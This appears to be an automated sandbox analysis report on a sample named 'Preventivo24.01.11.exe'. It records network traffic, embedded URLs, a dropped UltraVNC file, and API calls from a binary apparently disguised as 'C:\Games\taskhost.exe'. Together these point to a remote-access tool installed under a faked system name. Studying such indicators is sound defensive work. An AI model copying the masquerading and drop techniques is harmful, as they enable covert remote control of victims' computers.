Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficHTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: www.example.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
Source: shi6E82.tmp.0.drString found in binary or memory: http://.css
Source: shi6E82.tmp.0.drString found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.drString found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.drString found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.drString found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.drString found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.catJump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Games\taskhost.exeCode function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0100AD30 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAEA60 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E98BD0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA2CE0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBCDD0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9B5C0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F555C0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9BC20 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,
Source: C:\Games\taskhost.exeCode function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintf